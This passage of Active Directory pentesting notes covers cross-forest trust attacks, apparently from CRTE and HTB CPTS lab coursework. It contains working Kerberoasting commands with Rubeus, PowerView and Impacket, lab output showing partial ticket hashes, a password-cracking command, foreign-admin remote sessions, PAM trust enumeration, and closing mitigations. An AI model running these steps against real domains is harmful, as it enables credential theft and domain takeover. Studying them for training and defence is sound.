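    """Return (kept, dropped) for extra SIDs in a ticket issued by trust.target."""
    flags = set(decode_trust_attributes(trust.attributes))
    kept, dropped = [], []
    for sid in extra_sids:
        prefix, rid = split_sid(sid)
        if "WITHIN_FOREST" in flags:
            ok = True              # parent/child: ExtraSids are honoured as-is
        elif prefix == trust.target_sid:
            ok = True              # the trusted domain's own SIDs always pass
        elif "FILTER_SIDS" in flags:
            ok = False             # quarantine: nothing foreign passes
        elif "FOREST_TRANSITIVE" in flags and "TREAT_AS_EXTERNAL" not in flags:
            ok = False             # forest trust without sIDHistory: foreign SIDs dropped
        else:
            ok = rid >= 1000       # sIDHistory honoured; well-known RIDs (< 1000) dropped
        (kept if ok else dropped).append(sid)
    return kept, dropped


# Constructed sample data. LOGISTICS_SID and INLANE_EA_SID are values shown on this
# page; FREIGHT_SID is a constructed placeholder (the page never shows it).
LOGISTICS_SID = "S-1-5-21-2806153819-209893948-922872689"
INLANE_EA_SID = "S-1-5-21-3842939050-3880317879-2865463114-519"
FREIGHT_SID = "S-1-5-21-1111111111-2222222222-3333333333"
CHILD_TRUST = Trust("INLANEFREIGHT.LOCAL", "LOGISTICS.INLANEFREIGHT.LOCAL", LOGISTICS_SID, 32)
FOREST_TRUST = Trust("INLANEFREIGHT.LOCAL", "FREIGHTLOGISTICS.LOCAL", FREIGHT_SID, 0x8)
FOREST_TRUST_SIDHIST = Trust("INLANEFREIGHT.LOCAL", "FREIGHTLOGISTICS.LOCAL", FREIGHT_SID, 0x8 | 0x40)
# Extra SIDs to evaluate: the page's Enterprise Admins SID (RID 519), a constructed
# RID-1105 group in the trusting domain, and the well-known S-1-5-9.
SAMPLE_EXTRA_SIDS = [INLANE_EA_SID, "S-1-5-21-3842939050-3880317879-2865463114-1105", "S-1-5-9"]

if __name__ == "__main__":
    for t in (CHILD_TRUST, FOREST_TRUST, FOREST_TRUST_SIDHIST):
        print(f"{t.source} <- {t.target}: {decode_trust_attributes(t.attributes)}")
        for note in trust_findings(t):
            print("  !", note)
        print("  kept/dropped:", filter_sids(t, SAMPLE_EXTRA_SIDS))
```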
Windows - Cross Forest Kerberoasting
CRTE
From forest1 to forest2
Enumerate named service accounts across forest trusts
# PowerView
Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain $_.TargetName}
# AD Module
Get-ADTrust -Filter 'IntraForest -ne $true' | %{Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName -Server $_.Name}
Request a TGS
Rubeus.exe kerberoast /user:storagesvc /simple /domain:forest2.local /outfile:euhashes.txt
# With Powershell
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList MSSQLSvc/file.forest2.local@forest2.local
Crack
john.exe --wordlist=C:\path\to\10k-worst-pass.txt C:\path\to\hashes.txt
CPTS
From inlanefreight.local - Powerview
PS C:\htb> Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
samaccountname
--------------
krbtgt
mssqlsvc
PS C:\htb> Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc |select samaccountname,memberof
samaccountname memberof
-------------- --------
mssqlsvc CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL
PS C:\htb> .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.2
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target User : mssqlsvc
[*] Target Domain : FREIGHTLOGISTICS.LOCAL
[*] Searching path 'LDAP://ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL/DC=FREIGHTLOGISTICS,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=mssqlsvc)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : mssqlsvc
[*] DistinguishedName : CN=mssqlsvc,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL
[*] ServicePrincipalName : MSSQLsvc/sql01.freightlogstics:1433
[*] PwdLastSet : 3/24/2022 12:47:52 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*mssqlsvc$FREIGHTLOGISTICS.LOCAL$MSSQLsvc/sql01.freightlogstics:1433@FREIGHTLOGISTICS.LOCAL*$<SNIP>
Windows - Admin password reuse
Enumerate groups with users that do not belong to the domain, also known as foreign group membership
PS C:\htb> Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
GroupDomain : FREIGHTLOGISTICS.LOCAL
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=FREIGHTLOGISTICS,DC=LOCAL
MemberDomain : FREIGHTLOGISTICS.LOCAL
MemberName : S-1-5-21-3842939050-3880317879-2865463114-500
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114-500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGISTICS,DC=LOCAL
PS C:\htb> Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500
INLANEFREIGHT\administrator
PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> whoami
inlanefreight\administrator
[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03
Primary Dns Suffix . . . . . . . : FREIGHTLOGISTICS.LOCAL
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : FREIGHTLOGISTICS.LOCAL
Linux - Cross Forest Kerberoast
$ GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------------------- -------- ------------------------------------------------------ -------------------------- --------- ----------
MSSQLsvc/sql01.freightlogstics:1433 mssqlsvc CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL 2022-03-24 15:47:52.488917 <never>
Adding the -request flag gives us the TGS ticket
$ GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------------------- -------- ------------------------------------------------------ -------------------------- --------- ----------
MSSQLsvc/sql01.freightlogstics:1433 mssqlsvc CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL 2022-03-24 15:47:52.488917 <never>
$krb5tgs$23$*mssqlsvc$FREIGHTLOGISTICS.LOCAL$FREIGHTLOGISTICS.LOCAL/mssqlsvc*$10<SNIP>
Cross Forest Trust - TGT Delegation across trusts
TGT Delegation is disabled by default and must be explicitly enabled across a trust for the trusted (target) forest
Enumeration
netdom trust trustingforest.local /domain:trustedforest.local /EnableTgtDelegation
# AD Module - Run on trusting forest DC
Get-ADTrust -server trustingforest.local -Filter *
If TGT Delegation is enabled, unconstrained delegation can be used across the trust
Cross Forest Trust - Foreign Security Principals (FSP)
Enumeration
# PowerView
Find-ForeignGroup -Verbose
Find-ForeignUser -Verbose
# AD Module
Get-ADObject -Filter {objectClass -eq "foreignSecurityPrincipal"}
Cross Forest Trust - Bastion - PAM Trust
A PAM trust is usually enabled between a bastion (or "red") forest and the production/user forest it manages. It provides the ability to access the production forest with high privileges without using credentials of the bastion forest
Shadow Principals are created in the bastion domain and then mapped to the SIDs of DA or EA groups in the production forest
Get-ADTrust -Filter *
Get-ADObject -Filter {objectClass -eq "foreignSecurityPrincipal"} -Server bastion.local
On bastion DC, enumerate if there is a PAM trust:
$bastiondc = New-PSSession bastion-dc.bastion.local
Invoke-Command -ScriptBlock {Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}} -Session $bastiondc
Users that are members of the Shadow Principals
Invoke-Command -ScriptBlock {Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl} -Session $bastiondc
PSRemoting session on bastion-dc and access production.local
Enter-PSSession 192.168.102.1 -Authentication NegotiateWithImplicitCredential
Mitigation - One way domain trust
The following security controls should be implemented to mitigate a one-way domain trust bypass:
Limit access to Domain Controllers to only privileged users that require access. This reduces the number of opportunities for malicious actors to gain access to Domain Controllers.
Restrict privileged access pathways to Domain Controllers to jump servers and secure admin workstations using only the ports and services that are required for administration. Domain Controllers are classified as ‘Tier 0’ assets within Microsoft’s ‘Enterprise Access Model’.
Encrypt and securely store backups of Domain Controllers and limit access to only Backup Administrators. Backups of Domain Controllers need to be afforded the same security as the actual Domain Controllers. Malicious actors may target backup systems to gain access to critical and sensitive computer objects, such as Domain Controllers.
Only use Domain Controllers for AD DS and do not install any non-security-related services or applications. This reduces the attack surface of Domain Controllers as there are fewer services, ports and applications that may be vulnerable and used to compromise a Domain Controller.
Centrally log and analyse Domain Controller logs in a timely manner to identify malicious activity. Domain Controller logs provide a rich source of information that is important for investigating potentially malicious activity on Domain Controllers and in the domain.
Disable the Print Spooler service on Domain Controllers. For example, malicious actors have targeted the Print Spooler service on Domain Controllers as a technique to coerce authentication to a system they control in order to collect the Domain Controller's computer object password hash or TGT. Malicious actors can then use this to authenticate to the Domain Controller they coerced and gain administrative access.